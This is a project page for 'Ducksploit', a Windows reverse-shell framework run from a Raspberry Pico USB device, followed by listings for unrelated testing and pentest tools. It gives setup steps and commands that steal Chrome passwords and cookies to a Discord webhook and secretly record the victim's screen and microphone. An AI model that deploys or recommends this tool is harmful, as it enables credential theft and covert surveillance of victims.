DUCKSPLOIT - Windows Hacking FrameWork using Reverse Shell

Related tags

Testingpythonwindowsframeworkreverse-shellhackingwindows-10batchbatch-filebatch-scriptbatchfilebatch-processingbatwindows-11canarddu38duckpvpteamducksploit
Overview

banner

Ducksploit

Install Ducksploit

Hacker

setup raspberry pico
  1. Download https://github.com/DuckpvpTeam/DUCKSPLOIT/archive/root.zip
  2. Extract downloaded zip file
  3. Go in PICO SETUP folder
  4. Plugg your raspberry pico on your PC with the BOOTSEL button picobootbutton
  5. Move CircuitPython.uf2 file in the E:\ usb port (port of your pico) now your raspberry pico gonna leave usb port and reconnec with CIRCUITPY name
  6. Erase all the content of your raspberry pico and copy 'copy' folder into him
  7. Write myip.txt and write your own IP
  8. Now your raspberry pico is full configured , unplugg your pico and done!
setup ducksploit commands
  1. Download https://github.com/canarddu38/DUCKSPLOIT/archive/root.zip
  2. Extract downloaded zip file
  3. Go in SERVER folder
  4. If python is not installed, launch 'installpython.bat' or download at https://www.python.org/ftp/python/3.8.0/python-3.8.0.exe
  5. Install python requirements using 'installrequirements.bat' script
  6. launch setup.bat ###MUST BE RUN AS ADMINISTRATOR###
  7. Ducksploit is now installed on your PC 😄
  8. Type 'ducksploit' in the cmd
  9. Config your ip using 'ipconfig' (your ip)
  10. Wait victim's connection using 'wait' command
  11. Have fun with ducksploit hacking commands (type help to get commands list)

Victim

Just plugg the raspberry pico in your pc (or hacker can do also) That will start automaticaly the client of the reverse shell

⚠️ Ducksploit is made for legal use or educational use ⚠️

Uninstall Ducksploit

  1. type 'ds uninstall' in cmd
  2. Done 😄

SUPPORT

Donate 👍 using Paypal

Commands

Launch

Command Usage Result
wait wait wait your victim's connection

Config

Command Usage Result
ipconfig ipconfig (your ipv4) config your ip

Account

Command Usage Result
register register reconfigure your account
accountinfo accountinfo view all your account's infos

Exploits

Command Usage Result
stealpwds stealpwds (discord webhook url) steal all saved chrome passwords of your victim and send them into a discord webhook
stealcookies stealcookies (discord webhook url) steal all saved chrome cookies of your victim and send them into a discord webhook
open open (applicationname.exe) open mensioned application
recordscreen recordscreen (time in second) record victim's screen durring amount of time
recordmicro recordmicro (time in second) record victim's micro durring amount of time

Mouse

Command Usage Result
mouseclick mouseclick [left, right, middle] make the victim click the mensionned button
mousemove mousemove (x) (y) move the victim's cursor by x and y pixels
mousescroll mousescroll (int between -1000 and 1000) make the user scroll by int pixels
locatemouse locatemouse get the victim's cursor current locations

Alert Window

Command Usage Result
msg msg [-file, -text] (title) (line1) (line2) create an alertbox and send it on the vitim's pc with a title and 2 lines (if -file set line1 to createfile command content)
createfile createfile (text) set the content of line1 of msg command

Troll

Command Usage Result
skull skull spam cmds with skull and crossbones

Mysc

Command Usage Result
uninstall uninstall uninstall ducksploit
update update update ducksploit
credits credits view ducksploit's credits
exit exit exit from the ducksploit treminal
help help getting the list of all commands
shutdown shutdown make the victim's pc shutdown
reboot reboot make the victim's pc reboot
closesession closesesion make the victim's session close
Owner
We're smart developers , and we work on Windows & android :+1: (DUCKSPLOIT is comming... :hourglass_flowing_sand: )
GitHub Repository https://duckpvpteam.github.io/Ducksploit
Bayesian A/B testing

bayesian_testing is a small package for a quick evaluation of A/B (or A/B/C/...) tests using Bayesian approach.

Matus Baniar 35 Dec 15, 2022
Penetration testing

Penetration testing

3 Jan 11, 2022
Lightweight, scriptable browser as a service with an HTTP API

Splash - A javascript rendering service Splash is a javascript rendering service with an HTTP API. It's a lightweight browser with an HTTP API, implem

Scrapinghub 3.8k Jan 03, 2023
d4rk Ghost is all in one hacking framework For red team Pentesting

d4rk ghost is all in one Hacking framework For red team Pentesting it contains all modules , information_gathering exploitation + vulnerability scanning + ddos attacks with 12 methods + proxy scraper

d4rk sh4d0w 15 Dec 15, 2022
PENBUD is penetration testing buddy which helps you in penetration testing by making various important tools interactive.

penbud - Penetration Tester Buddy PENBUD is penetration testing buddy which helps you in penetration testing by making various important tools interac

Himanshu Shukla 15 Feb 01, 2022
a plugin for py.test that changes the default look and feel of py.test (e.g. progressbar, show tests that fail instantly)

pytest-sugar pytest-sugar is a plugin for pytest that shows failures and errors instantly and shows a progress bar. Requirements You will need the fol

Teemu 963 Dec 28, 2022
Travel through time in your tests.

time-machine Travel through time in your tests. A quick example: import datetime as dt

Adam Johnson 373 Dec 27, 2022
buX Course Enrollment Automation

buX automation BRACU - buX course enrollment automation Features: Automatically enroll into multiple courses at a time. Find courses just entering cou

Mohammad Shakib 1 Oct 06, 2022
A modern API testing tool for web applications built with Open API and GraphQL specifications.

Schemathesis Schemathesis is a modern API testing tool for web applications built with Open API and GraphQL specifications. It reads the application s

Schemathesis.io 1.6k Dec 30, 2022
Akulaku Create NewProduct Automation using Selenium Python

Akulaku-Create-NewProduct-Automation Akulaku Create NewProduct Automation using Selenium Python Usage: 1. Install Python 3.9 2. Open CMD on Bot Folde

Rahul Joshua Damanik 1 Nov 22, 2021
Webscreener is a tool for mass web domains pentesting.

Webscreener is a tool for mass web domains pentesting. It is used to take snapshots for domains that is generated by a tool like knockpy or Sublist3r. It cuts out most of the pentesting time by scree

Seekurity 3 Jun 07, 2021
Make Selenium work on Github Actions

Make Selenium work on Github Actions Scraping with BeautifulSoup on GitHub Actions is easy-peasy. But what about Selenium?? After you jump through som

Jonathan Soma 33 Dec 27, 2022
A simple Python script I wrote that scrapes NASA's James Webb Space Telescope tracker website using Selenium and returns its current status and location.

A simple Python script I wrote that scrapes NASA's James Webb Space Telescope tracker website using Selenium and returns its current status and location.

9 Feb 10, 2022
A toolbar overlay for debugging Flask applications

Flask Debug-toolbar This is a port of the excellent django-debug-toolbar for Flask applications. Installation Installing is simple with pip: $ pip ins

863 Dec 29, 2022
An AWS Pentesting tool that lets you use one-liner commands to backdoor an AWS account's resources with a rogue AWS account - or share the resources with the entire internet 😈

An AWS Pentesting tool that lets you use one-liner commands to backdoor an AWS account's resources with a rogue AWS account - or share the resources with the entire internet 😈

Brandon Galbraith 276 Mar 03, 2021
Ab testing - The using AB test to test of difference of conversion rate

Facebook recently introduced a new type of offer that is an alternative to the current type of bidding called maximum bidding he introduced average bidding.

5 Nov 21, 2022
🏃💨 For when you need to fill out feedback in the last minute.

BMSCE Auto Feedback For when you need to fill out feedback in the last minute. 🏃 💨 Setup Clone the repository Run pip install selenium Set the RATIN

Shaan Subbaiah 10 May 23, 2022
Connexion-faker - Auto-generate mocks from your Connexion API using OpenAPI

Connexion Faker Get Started Install With poetry: poetry add connexion-faker # a

Erle Carrara 6 Dec 19, 2022
自动化爬取并自动测试所有swagger-ui.html显示的接口

swagger-hack 在测试中偶尔会碰到swagger泄露 常见的泄露如图: 有的泄露接口特别多,每一个都手动去试根本试不过来 于是用python写了个脚本自动爬取所有接口,配置好传参发包访问 原理是首先抓取http://url/swagger-resources 获取到有哪些标准及对应的文档地

jayus 534 Dec 29, 2022
Argument matchers for unittest.mock

callee Argument matchers for unittest.mock More robust tests Python's mocking library (or its backport for Python 3.3) is simple, reliable, and easy

Karol Kuczmarski 77 Nov 03, 2022